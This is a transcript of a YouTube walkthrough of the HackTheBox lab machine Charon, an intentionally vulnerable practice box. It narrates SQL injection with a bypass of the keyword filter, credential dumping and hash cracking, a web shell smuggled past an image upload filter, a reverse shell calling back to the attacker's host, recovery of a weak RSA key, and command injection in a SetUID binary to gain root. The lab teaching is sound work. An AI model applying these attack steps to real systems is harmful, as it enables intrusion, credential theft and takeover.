What's going on, YouTube? This is IPSec, and we're going to be doing the Charon machine from HackTheBox. This box got a lot of hate because it has some things that people absolutely hate dealing with. The first thing you're greeted with is a exploitable service that's a rabbit hole, which means no matter how hard you exploit it, you're not going to get any useful information out of it. And it's up to you to know when you've tried enough and you should move on to the next thing. And it really highlights the importance of always having some type of enumeration running in the background. Then once you do that, you're greeted with another exploitable service that's configured in an odd way that you'd never see in the real world, but it's configured that way so you can't use automated tools against it easily. So that's the second piece. The third piece, just a weird thing you'd only ever see in a CTF, and then after that, it's all downhill from there. You got some crypto that is fun to do, and a exploitable binary that you have to do a light reverse engineering on. It's a hard box, but a great learning experience, so let's jump in. Like every other box, we're going to start off with Nmap, so save script, SV for enumerate version, OA output all formats, give it a name, and the IP address of Charon, which is 10.10.10.31. Not going to run it because it may take a while. Let's just look at the output. We see it is listing on port 22 and 80. That is SSH and HTTP. HTTP is the thing that is most interesting, so that's what we're going to look at first. So going to the IP address, we're greeted with a web page. The very first thing I want to do is tell my burp proxy to spider the host and crawl the web page, and that's going to accumulate all the links for that page. So may take a while, nice to run in the background. And the first thing I look for is like a copyright or some type of information. The copyright's important because I can kind of get a feel of when the page was last updated. If I saw like 2014, I know it's probably going to be a public vulnerability because that is old. But I don't see that. What I do see is SuperCMS. So I want to find out what SuperCMS is because if I find the code out on the internet, I can try to figure out what version is running on this web server, and if it's a old version, there may be security patches in the changelog. I can go and look and see what they changed and find an exploit that way. Or I can just search exploit DB and know right away. So let's Google SuperCMS and see what comes back. We see two GitHubs right off the bat. So going to both of them, once they load. Come on. That's taking a while. So scroll down. Is there anything else? That one's interesting. I actually didn't see. This is a write-up. I wonder if that looks familiar. Some exploits is... Nope, that's a package list. Why is this taking so long? Burp proxy's off. My internet is just dead. Refresh all these. There we go. So this is actually a spoiler, it looks like. This machine is very similar to this, just looking over those SQL queries. When was this released? January 6, 2017, which is before this. So if someone found this, this would easily tell you how to exploit one of the later steps, I believe. I wish I looked at this before. But anyways, I digress. Let's look at what the actual code is. The first project, we do see composer.json. Composer is a PHP framework, so could be this. Go into all these folders. We see this Apache rewrite rule, and it's rewriting SuperCMS static to be /files. So let's go into the static directory. This is src, we don't care about that. Static, we see JS and jQuery. So /files, JS, and then jQuery.javascript. Doesn't exist. Going into burp, we do have a list of all the pages we were able to find. The JS directory is not underneath a directory called files, so let's just get rid of files. It's not there, and let's just do static in case they don't have that read-write rule. Not there. So it's not this application. We can close out of this and go into the next GitHub by Johnny Blue. This one's not so obvious what it's coded in, but it is PHP. Going to index.php and glancing through the code at the very bottom, we do see it is CodeIgniter, which is another PHP framework. So go back and let's open up each of these directories to see if anything looks familiar. Views sounds like it would be good. And going through this, we see everything's .php files, and going into burp, we have a bunch of .html. So I'm going to say it's probably not this. So right off the bat, we ruled out the possibility of having to do static code analysis of this box or find public vulnerabilities, etc. So we probably spent 5 to 10 minutes maybe and ruled out what could be 30 minutes of work. So the next thing is, did I already run GoBuster? I did not. So while that goes, let's just run GoBuster, see if we can identify other pages. So opt GoBuster -w user share word list GoBuster, and you can use like derb, www, fuzz, derbuster. It's whatever you're familiar with. I just like GoBuster for doing this. So directory list, we'll do 2.3 small -u for URL, http 10.10.10.31, and let that run. Let's name this GoBuster and create a new tab. So that's going to go in the background while we start playing with things. HTML files aren't that interesting to us. We want ones that we can submit content to, that have, which would be this PHP file. We see SinglePost.php, we can submit the parameter ID and give it a value, 10, 11, or 12. So what we're going to do is go to that page, and we could just go right in burp and cheat and get this request and send it to repeater. But I like actually seeing it to know what I'm looking at before I send it. So we go to one of these pages, and let's turn intercept on. Refresh, and then we can copy to file, and we'll call this SinglePost.request. And let's just cheat and run SQLMap against this. So SQLMap -r and specify the login request that we just created, SinglePost.request, -p for parameter, and we're going to give it ID. And it's going to say it is Boolean-based blind injectable. It detected it was MySQL. Do you want to keep running test? Yes. And we also see it is union injectable. So now we can just do --dump and dump the contents of this database. The next thing we can do, we see the contents is just one table called blog, and then just the post. There's no like user credentials, things like that. If we do SQLMap -h, we should be able to find the query for dumping user creds if they have any. -- passwords. So we can try that. So instead of dump, -- passwords, doesn't get anything because we don't have read privilege over the relevant database. So can't get passwords out of this database. Let's go do -hh for extended help and see what other parameters look beneficial. There is file read, potentially reading files off the server, so maybe we can read PHP files, and that allows us to get the actual contents of the PHP instead of what they produce. The difference is you can read like configuration files and potentially get passwords. So this one's going to be very good, and os-cmd is going to be good. So let's try those. -- file read equals etc passwd. And it says it fetched it to here, so let's see if anything's actually in it. Nothing's in it, so we can't read files outside of the web directory. That's not too interesting. We want --os-cmd, and we'll just do it to who am I. And it's going to say, hey, what language does it support? Because it works by using the into out file SQL thing to write files to the web server. So it's going to try to write like an ASP shell, a JSP shell, a PHP shell. We want to select 4 for PHP shell, and then it's going to say, hey, do you want us to try to guess the path? Sure. And then the common locations, yes, we don't want to specify. And it's trying to drop files to like all the potential web directories for www.html, nginx default, srv www, and at the end it says it wasn't able to write. So at this point, I'm thinking maybe this isn't exploitable. We have a SQL map, SQL injection, but I haven't been able to get any files, and I've done the low-hanging fruit of a SQL injection. So let's go back to my other enumeration stuff and see if we have any data. And looking at GoBuster, it's not done yet, but we see /CMS data, and that is a new folder to us. So let's go and look at what CMS data is. I think I have intercept on, so turn that off. CMS data. And we get a forbidden. So I'm going to do another GoBuster. Copy this. And we will change this to /CMS data. And we do -x for extension and PHP. What that's going to do is take every item in this directory and append .php to it and try to go to it in the CMS directory. Right off the bat, we do get a login.php. So let's go right there. And it also told us it was 200, which was okay, not the 400 error. So let's go back here, and we get a login prompt. The first thing I look at on a login panel is just default credentials like admin or admin password. And once those don't work, I may set up Hydra to brute force different credentials or use SQLMap on this page. In the sake of time, I know this isn't vulnerable, and I'm going to click this forgot password link. And we're going to just try to put random stuff in this password field, and we get incorrect format. And to make it a bit easier, let's real quick set up burp to intercept, send this, and send it to repeater. So we got the incorrect format. If this was in the form of an email, because that's what it's asking for, we get user not found with that email. So if I do a single quote, we get error in database. If I do a double quote, I get user not found. So we want to play around with that error in database, because all SQL injection is examining how the server behaves. And now we just triggered it to go down a different path, and we want to see if we can get this error out. So let's try adding a comment with --space-. And we do. User not found with that email. So what do we think has happened? Let's create a new tab here, and we'll call this explanation. So the SQL syntax, we can Google this real quick. MySQL select syntax. It's a really good page, or it should bring us to a good page. Turn intercept off. And this shows how the SQL query is formulated. So you start off with SQL, you have some options I've never really used. The select expression, this will be a column name, from which table, where. You can group it by certain things in ascending or descending order, having another condition, order it, again ascending, descending. Limit is really useful, we'll use that. And then it has like into out file, which allows you to potentially write to the hard drive SQLMap did. We tried that with OSCMD, tried to drop PHP shells, but didn't work. So this is handy because if you have like SQL injection in here, group by ascending, you know you can't do any of the queries back here. And union is right here where the where condition is. I'm not sure why it's not shown here. If we click on this union, it's a bit odd, but union fits after where. So if you have SQL injection here, you can do all the things down below, but you can't go up, if that makes sense. So let's write what we think a query is. So it's a select, and then probably username, from, we'll guess the table's called users because we're giving it an email and it's giving us a username, where email is equal to user input. So what we did is we changed user input to be asd@b.com and a single quote. So we have 3 quotes here, and if you've ever done anything with programming or just scripting, you know having the odd number of quotes is a very bad thing. So that's why we had the error in database, because this is an invalid query. And then when we added the comment with dash dash space dash, it took this comment out, and now this became the query, and that's a valid one. So what I'm going to do now is run this in SQLMap. So if we go back here, we can copy to file, forgot.request, and if we cat this, that was odd. Let's remove that, and we'll do this because I think that's stuff for artifacts from previous things. So it's because I just had that highlighted. And I think I found out why I never copied the file, because I tend to highlight things and it only copied pieces. So don't highlight anything, do forgot.request, and we have it. Awesome. For SQLMap to work well, it doesn't want any weird things, it just wants a legitimate query. So SQLMap-R for the request, forgot, -p, we want to inject an email. We can do all tests with risk 4, level 3. Level 4, risk 3 should do all test. And then we'll do --batch to say, hey, don't ever ask us a question, just always assume the default, because this is just background enumeration, and we don't want to be bothered. So, user not found. What we have to do now is see if we can do a union injection. And what union's going to do is going to override what the database says to us. So we can do this really quickly and then explain it more. So if we go back to 10, 10, 10, 31, go in this yogurt shop, go to a blog post, and SQLMap did a union injection. So we know there's 5 columns in this table, and that becomes important because you have to brute force the number of columns in the table, because if you have the wrong number of columns, it errors out. So if we do 10 union select 1, nothing goes on this page, error. 2, error. 3, 4, 5, because this has 5 columns, and the SQL query did not error out. We didn't overwrite anything, but if we didn't select a valid blog post, let's just select 42, we see we had complete control over what got displayed. And if we do like a SQL syntax like version, it outputs the SQL version running on the server. So that's a union, and we'll go more in depth right now. So union select 1. Again, we have to find out how many columns is in the table users, or what we think is users. And we get error. And this is a unique thing, because we didn't get this before. If we just mess with a query, we get user not found, and if we have a bad query, error in database. So I'm thinking that's some type of blacklist, and we just used a bad word. So I'm going to put union in the email and see if it works. It does. So I'm going to put space union, space. So union surrounded by spaces, and we get that error message. So that is a bad character to have, or a bad word. So what we're going to do is try changing the case. Let's just do one lowercase letter. And user not found. So they have a blacklist of bad words, but it's not case sensitive, so we can bypass that filter by just changing the case. Awesome. So union with one lowercase, and then select one. Should get error in database, and we also have to be wary to always put this comment afterwards because we have the single quote there. Try it again. Error in database. Select 2. Select 3. Select 4. Incorrect format. So this is a different message. This is good to know. So let's try changing the format. a@b.com. Didn't inject there. So let's copy this. Put this back to 1. Put a@b.com here. And I'm just assuming the format should be an email. It may not be, but based upon the functionality of this page, it sounds like it should be an email, or it feels like. So 3 didn't work. 4. And there we go. So we know this query is returning 4 items, and the last item is an email address. And we can kind of show that by, if we go back to this frozen yogurt page, and we move the version, let's do 4. Put the version at 4 instead of 5. You see, that's the 4th parameter it's pulling, and that's why it overwrote there. So that's why we didn't see any email sent until we did the 4th one, because this is the one that should be in the form of an email. So that's all good. We can control the output, but how do we send information back to us? Because if we just put version here, we get nothing. So what we're going to do is use concat. So go back to the explanation tab. If we do concat a, comma, b, that's going to give us AB. If we do version B, it's going to give us version B. So what we have to do is find table information and input that as the user portion of the email. So check if MySQL didn't work. Let's see. It says it wants us to rerun provide a valid thing for string, and we know that if it says incorrect, it may be valid. So that's what we're going to add. So -- string invalid on SQLMap. Let that run in the background. Maybe it'll get something, maybe it won't. But let's look into a very important table in MySQL, and that is the information schema table. I think we can just do information schema MySQL. If we look at this, this is a database that has information about all tables, columns, users, etc. in MySQL. And one very cool table is the columns table. This table has table schema. It's going to say the database name. That's what table schema means. It's going to have the table name, and it's going to have the column name. So these 3 things is everything we need to dump a database. So if we go back into, I guess SQLMap's not going to work. We can ignore that. One of those should have worked, but it's still a pain. So go back into BERT. And we want to say we're going to grab the concat of, was it schema name? Is that the table? Table schema. Table schema, then table name and column name. And we also have to have at b.com tailing it. So the issue with this concat right now is these are all going to blend together really well. So we're going to add a colon between them. And that should be good. So we can copy this, replace that with a concat, and now we have to do from information schema dot columns. So this is going to be select, then these items, table schema, table name, column name, from the database dot columns, and that should be it. Click go, we get error. So I'm guessing one of these is a bad word. Change the case again on information, and it works. But we get a user not found. So one other thing we forgot to do is put a limit, because right now this query is going to return hundreds of rows. And when it returns all those hundreds of rows into one parameter, it may turn that into like an array or something and do some type of type confusion. So we want that to just be one row, because that's what the script is expecting to receive. So we're just going to do limit 1. And now we get email sent to information schema, which is the table schema. Then you got that colon, character sets, which is the table name, and column name. But this information schema table is noisy. So we want to just do where table schema does not equal information schema. And now we got SuperCMS groups group ID. So this is the very first column. Now the issue is we could do limit 1 ascending, order by, was it group ID? Is that what it is? And limit 1 probably goes after that. Where's the SQL syntax? So order by is before limit, but it has a space. And was it just spelled group ID? Let's get rid of this. What was the table? GOP ID. So where order by GOP. Oh, order by column ascending. Nope. We're just going to get rid of that order by. I'm not thinking straight right now. We're going to do the easy way. And we can just say, hey, there's another command called offset. And that's going to get the row number. So limit 1's always going to return one row. Offset 0 is going to return the very first row of that. Offset 1, the second row, 3, and so on. So very first row is what we see, the group ID. Go to the next row by changing offset. We got user ID. Go to the next row, license key, and so on. So what we want to do is automate this, because there could be thousands of rows. We never know. So I'm going to copy as a curl command. And we're going to call this columns.sh and just do a simple bash script. That curl is ugly. So we're just going to manually do this because it's not too hard. So put this in. The very first thing I want to do is I want to get rid of all these double quotes I have. I only want to use one type of quote because I'm going to do a payload equals and I don't want to bother about escaping anything. So I can show you real quick. For I in sec 0 do payload equals. So right now, this is going to error out because I'm trying to have this string and I have this double quote and it's going over here and getting terminated right here. I don't want that. So if I do bash columns, I don't think that actually errored. Huh. Bash was smart enough not to do that. That's weird. What I was going to say is I was going to convert all these to be single quotes, so I don't have to worry about that, but union select. It didn't put at b.com in double quotes, and I want that to be. It's not perfect. So this is still going to error because it just took all the quotes out by default. That was weird. So what we're going to do, %s for search and replace, and we're going to do escape double quote and replace it with escape single quote g. And now all double quotes turn into singles. And now I can put that to show what exactly it was talking about. So here's the new one when I replaced all doubles with single quotes. And we have quotes around these colons and quotes around this email. And those were the two important things I noticed that would have caused an error. So now we got the payload. Now let's go to curl -s for silent, -d for data, payload, and then HTTP 10.10.10.31 CMS data forgot.php. Option D is unknown. Wait, what? Option dash. That shouldn't be unknown. Less data. I guess we can do -- data. Oh no, it probably wants this in quotes. So we pass this as one argument because we have a bunch of spaces in payload. So that should work. Yep, we're getting a bunch of data, but it's returning all that HTML. So what we want to do is grep for what we want. So we can pipe this to grep -o to only show us what we search for. And we want to say the string begins with a space, goes until, what do we have, b.com. And try this. Not returning anything. Okay, so we have something here. So let's just grep for b.com. We have an error in our curl. Because we should get that, because we have an injecting there. So sec 0 to 0 do columns, get rid of the grep, and see what the page is saying. I think we have to have at least one. Okay, so we can search for incorrect, no, email, no. Something went wrong. Oh, wait. I don't even know why I looped that, because I don't even have that there. Echo payload. Oh, payload is equal to email. There we go. This should work. Yep. So grep. Now we want that. Okay. It only returned 2 columns, which is odd. Echo payload. Oh, that's not odd, because I turned my sequence. There we go. And now we can dump all the columns and tables in this database. So we have groups, license, operators, and operators has username and password. These are the ones that are of interest to me. So that's what we're going to look at and dump those next. So if we go back into a boot, we want to do, let's see, this table and column. So concat, and we want to get this one too. So operators, no, we want username. So first is column, so underscore underscore username underscore, that's obnoxious. And password. Underscore underscore password underscore. Get rid of that. So now we're selecting the username and password, and we also have to append that b.com from, we're no longer information schema.columns, we are going from SuperCMS operators. SuperCMS operators. This where statement is gone. Get rid of these lines. Go. And we got first one. Test one, and then looks like an MD5 sum. So this is the new payload. So we're going to copy columns to users.sh and modify the payload. Payload equals, and I use double quotes here again. Shoot. Single quote, single quote, and that should be good. So now when I run my users.sh, we're dumping a bunch of users, and why did it only do test one? Oh, offset I. So we're dumping all the test users, and it's all the same hash. If we grab this and just Google it, we get the password is, I believe, password. Decoded value is password. But if we dump more of these, we'll actually find a different user. So let's do that and dump the whole table. Say 1,000. We'll just do 300. We'll be kind. And we get the very last one, which is SuperCMS admin and a different password. So change this, search for this MD5 sum, see if this site has it. Doesn't look like it, so just Google it. And we get the hash. It is Tamaro, Tamaro. So if we log in to that website as SuperCMS admin, we should be close. SuperCMS admin, password Tamaro. What was the username? ADM. SuperCMS ADM, password Tamaro, and we're logged in. Awesome. This is the only part of the challenge I really didn't like because this is very CTF-like. We have this page. If we try to edit this, nothing here. This is another rabbit hole. There is a upload image file, and if you look at the page source, you have this input type hidden equals name and a base 64 thing. So if we echo-n base 64-d, test file 1 is the name. So let's go into burp, options, intercept, and go back to this page, refresh. We got to intercept on, refresh, forward upload. Now we can edit this request, take these comments out. We don't need to do this anymore. We can just do input, name, and that's equal to test file 1. Forward, turn intercept off, and now we have another parameter which will be a file name. So we'll just do test.php or do ipsec.php. And browse, we have to do a shell. So other locations, root, opt, shell, PHP, and I'm going to do, I think CMD PHP JPEG is what I want. So if we do CMD PHP JPEG, the very first thing it says is GIF8, and what GIF8 does, if you put that in a file, it makes file recognize it as a image, because that is the magic byte for a GIF. So that's the contents of the shell I'm uploading. And go here, paste this, and I guess we can try just submitting and see what it says. Success. So it uploaded ipsec.php. If we tried a PHP script like cmd.php, let's see, Unicode text, submit, doesn't allow. If we edit this, Intercept off. Take the magic byte out. We get only image files. So that was one of the bypasses you had to do, is have this shell script act like a PHP and also do that hidden parameter. Really stupid. So now we want to look in, what did it upload to? Do I have that on my clipboard? No. HTTP history. Repeater. Go. What are you uploading to? Images ipsec.php. Intercept off. And I got my shell. Do ipsec equals ls. Was it just ip? What was the contents of my shell? Request ip. So now we have command execution on this web server. So what we want to do is a reverse shell. So let's go to pen test monkey. We can just do reverse shell cheat sheet. And I'm going to use this one. Paste this in. Let's turn intercept on. I have much better luck when doing this over a post request. So I'm going to change request to post. URL decode this so we can edit it, because we have to change our IP. So 1010, what's our IP? 1430. We'll say port 8081. Is that the shell? That looks off. Okay, yep. URL encode this. NC LVNP, listen on 8081. Go. Got our shell. So now we can do python-c import pty, pty.spawn, bin bash, sty raw minus echo, and I did control Z to background that, and then I typed that, foreground, and now I have a fully interactive shell. So we can go to /home, go in decoders directory, and see we get permission denied. There is a decoder.pub and pass.crypt. If we cat decoder.pub, we get a public key, and cat pass.crypt, we get gibberish. I thought that was supposed to be hex. Yeah. It's weird that my cat was showing it like that, but we're going to transfer both of those files to my local box so we can work with them. So base64, both of them. Copy here, dear crypto, what was this called? Decoder.pub. We want that to be .base64. Go back here. Base64 pass.crypt. V. paste. So now we can do base64-d on decoder.pub, and then pass.crypt. What? Okay, it just had a space at the end, and that's what it complained about. So we got all the files we needed. I made the crypto directory, but didn't put the files there. So decoder and pass and crypto. Go into crypto, and now we can begin with doing this. So if you are lost in the previous parts of the video, I have some bad news. This is where we do the crypto, and I just don't have a good way to explain it. The good news is crypto problems are so common. There's a lot of frameworks and tools out there that just have an easy mode button. We'll do that first using the RsaCtfTools that is on GitHub. If you just Google RsaCtf util, or maybe it's tool, not util. And I think my intercept is on. RsaCtfTool. You can download it, and it's going to make it easy. So we can look at decoder.pub. This is a RSA key, and it is, I think, 256-bit. And then we have pass.crypt, which is the encrypted contents. If we just xxt that, we can see it's a bit more than cat is showing, but either way, we're going to use opt RsaCtfTool and then RsaCtfTool.py. We can just specify -- public key, and it's going to be decoder.pub, and then -- uncipher pass.crypt. Let this run, and it's already reversed it. So the password is nevermind, or probably one nevermind the bullocks, or nevermind the bullocks. I don't think that one is supposed to be there, but that's the cheating way to do this entire problem. Because if we now SSH decoder at 10.10.10.31, type nevermind the bollocks, we get in. But we don't want to do the cheat way. We want to actually figure out what RSA is doing. So RSA is a lot of math, and it's really just prime number factorization, which means you take a really big number and then find two different primes that when multiplied together, they equal that number. So sounds really easy, but if you knew how to do this efficiently with giant numbers, RSA is completely dead. This is a 256-bit key, I think, and that is doable very quickly. As you saw, RsaCtfTool did that behind the scenes. So we're going to use, first go into Python, and we're going to do from crypto public key import RSA. And import a piece of RSA, we're going to do f for file open decoder.pub, and we want that to be read. And then we can do key is equal to RSA.import key f.read. Now we should be able to print values. So the two values we need of a key is n. N is that giant number. That is in the public key. And we have that right here. The other number is going to be E, and that's probably going to be like 65537, I think is the common one. Yeah. Almost all the time, E is going to be equal to this. And it looks like a big number, but to give you an idea, let's import my SSH private key. So it's root.ssh id rsa.pub, I think is the location. Re-import the key, key.n, and we can see a much, much larger number than this. And then key.e still 65537. Again, E is probably not going to change. So Let's split this window and v notes and put n is equal to... I cannot copy that. Hit that down. Still can't copy. Okay. That was weird. So that's what our n is equal to. And we can also do e. So e is equal to 65537. Okay. So now we have to find the two factors that equal, or two prime numbers that equal that when multiplied together. That window is doing something really odd, but oh well. Opt. I'm going to use MSIEVE to do this. And if I just do that, give it the prime number, this should find it automatically. Oh crap, it's probably not going to. If we look in the log, because I gave it n equals. So let's see what happened. Let's see. Wait, what? Did it actually do that? Yeah, it still found it. So we got the two factors. These two numbers, when multiplied together, will equal that n. And I have no clue why my vi did that again. But go multiply that by this. And we get 851611. Go to the window down here. 851. So we found the two prime factors, and we can name them P and Q. So copy there. Paste Q. Paste. Ooh, that's just behaving better. So we got all the numbers we need to actually generate the private key. The fact that we're able to get P and Q, that's really all you need. And this alone pretty much gives you the private key. So we have to give a few more variables to make our equations look better. We have to give it n. Well, we have n. We could have just done n equals p q, but we have n, so it doesn't matter. We'll need m, and this is going to be n minus p plus q minus 1. And go to Google. We have to Google for a function. The modular multiplicative. I can't pronounce this. But modular every time I try it, multiplicative inverse function in Python. This is the function we want. One like that. So set paste this in. Okay. We need to import RSA, so from crypto.public key import RSA. And then we need to calculate D, which is equals mod env em. E is that exponent up there. M is what we just typed, that small equation. And key is equal to RSA construct n long E D P Q. Print key, export key. See if that works. It'll be a miracle if that does. MV notes to genkey.py, Python genkey. Nope, construct takes exactly 2 arguments and 6 given. So let's see. RSA construct. And there we go. We have a private key, like magic, just generated. So if we go into the crypto directory, let's move that here to be consistent. We can create a private key, so decoder.priv, and now we can use OpenSSL. So OpenSSL RSA util-decrypt in-key decoder.priv, and we will direct pass.crypt to it. And we get never mind the bollocks. So that is the RSA portion if you want to do it by hand. Sorry, I don't even know fully what goes on in my head to how RSA fully works, other than lots of math, lots of copy and pasting off other people's work, and magic. So we can finally SSH into 10.10.10.31 as the decoder user. This video's gotten long, so I'm going to cheat, and we're going to jump right to how to exploit the PrivEsc without doing a bunch of enumeration. So we'll do sudo-l, never mind the bollocks, or whatever you say, and we see decoder cannot run sudo on Charon. So the next thing I look for is SetUID binaries, so find /-perm, anything with the SetUID bit set, pipe standard error to dev null, and we see user local bin SuperShell. So execute the program, see it wants a command, so we give it ID, very beta, doesn't give us any output. Touch/temp/ipsec ls/temp, didn't work. Says usage SuperShell, and it only wants one command, so we will give it one command, or one argument. Nope, does not work. So let's see what SuperShell actually does. In order to do that, we have to get it to a computer. So we're going to base64, user local bin SuperShell, pipe that to netcat, 10.10.14.30 is our IP, 80.82 is the port we'll use. Set up a netcat listener, so LNP 8082. Pipe everything to supershell.b64, or direct, not pipe. Enter, sent it. So now we can cat supershell b64, have a file, base64-d to decode it, supershell. So file, everything set. And if we wanted to, we could use BinaryNinja if we have it. Use this first because it makes it a bit easier, nice visual interface. It does cost a little bit of money though. So clicked over to go to the main function, and we see this nice pretty call graph, or whatever this is called. So function main, we saw this when we gave it 2 arguments, we went down here and it exited. So I'm guessing right here this is comparing the number of arguments versus 2 or more, and then exiting. So if we gave it 3, yeah, that has to be what that's doing. So scroll down, not sure what this is doing right here. We see something odd. It's loading /bin/ls and then immediately calling a compare function. And before that, we're doing these two. I would have to guess that this is loading arg1 into RAX 7. 7 is the number of bytes slash bin slash ls is. So I'm guessing it's going to compare these two strings, or at least the first 7 bytes. And if that is true, then we go, if that is, I hate doing this Boolean logic or explaining it. If slash bin slash, if the argument has slash bin slash ls in it, it's going to go down to here. And we're going to call printf SetUID. So we're going to escalate to the owner of this file and then send it to system. If not, then exit. So that's Radar. If you, that's BinaryNinja. If you didn't have BinaryNinja and want to do something free, you can use Radar. R2, and then the binary name. We're going to have to analyze everything, or tell it to analyze everything. So AAA, and then you can print functions with AFL, and that's going to be analyze function list. And we can see all the functions. That's what was in the left side of BinaryNinja. We're going to do V, enter, and this is going to bring us to visualization mode. And then P will cycle different panes to show different views of it. If you do capital V, it brings you to the little graphs of each function. You can do lowercase v, I think, and now we can just go down to which function we want. So sim main, and then hit G to go, and we get to that nice graph. If you didn't want to go through this, because this is definitely a lot of lists, you could hit a colon, and then S for search or seek, I don't know which one, space, sim.main, or whatever your function name is. Hit enter again to get out of this enter commands, and it also jumps you there. And we can see the same exact thing. So if there's more than one argument, call the usage, then exit. This one, still don't know, but it exits if whatever happens here. Then we have it loading bin ls and RDI, loading an argument into RAX, 7 into EDX, doing the compare, and if those two strings equal the same thing, we call printf SetUID and system. So that is Radar. Exit this, go back to our SSH, and let us exploit this program. So now we know we need slash bin slash ls. And does an ls of our current directory. So let's do root. We get the usage. That's right, everything has to be one argument. So send it in quotes, and this way when the program reads these arguments, this appears as just one argument despite it containing a space. And we can see root.text. So if we go cat bin ls, and we can do slash, say, do the command who am I, and this is going to error because it cannot access slash decoder. What happened was our terminal processed who am I. So if I just do echo who am I, let's do bash, echo who am I, and it goes to decoder. We don't want our terminal processing this. So if we do echo backslash who am I, let's put that in quotes, another quote, it echoes this. And this is what we want, because when we do this, it's going to send that to the syscall. So user local bin supershell bin ls slash backslash who am I, and then the quote. So before, our terminal right now processed it, did decoder, then sent slash bin slash ls slash decoder to SuperShell, which then ran system against that. Now we're going to be sending slash bin slash ls slash $, who am I, and it does a bin ls on slash root. So we verified we have code execution as root, we just can't do anything useful yet. So we can change that to be whatever we want. So cat slash root dot text, and we have code execution because we now just catted the root.txt file. If we really wanted to, we could do something like this. chmod 4755 on ipsec, or temp ipsec. And then when I do ls-la, we have ipsec with the sticky bit set. And the owner is not root, so we can just do chown root slash temp ipsec. And now we have that file with the sticky bit. Let's see. Looks like the, not sticky bit, SetUID bit, set. So, yeah, that is the box. Hope you guys enjoyed it, and take care. Actually, not goodbye yet, because I know people are going to ask what the whole SetUID thing was. Let's just show it real quick. So we have GCC installed on the machine, so we can write a quick C program. So we're going to write ipsec.c, and we're just going to do include standard h, include arrow.h. I have two spaces there. Whoops. There we go. Main and C v set UID 0, set GID 0, MP equals 0, system bin bash v mp, be fine, return. Okay, gcc-o shell ipsec.c. I think I can't have that capital. Not having the history is annoying. Why didn't that work? No semicolon. Okay, we got the shell. So if I just execute this, nothing's going to happen because it doesn't have the sticky bit, or not stick, SetUID bit, and it's not owned by root. So let's do the SuperShell ls And then we will chown root to be on shell. Okay. ls-la. Oh, wait. This needs to be /bin/ls. So now I am not doing well on this one. Backslash before the $sign. Now it should be owned by root. There we go. And we have to just do one last thing and chmod it. So chmod for 755. The 4, this is the SetUID bit. .la. We now have the SetUID bit set. So now when I execute shell, I am root. I can do anything I want. So now that is it for the video. Hope you guys enjoyed. Take care. Bye.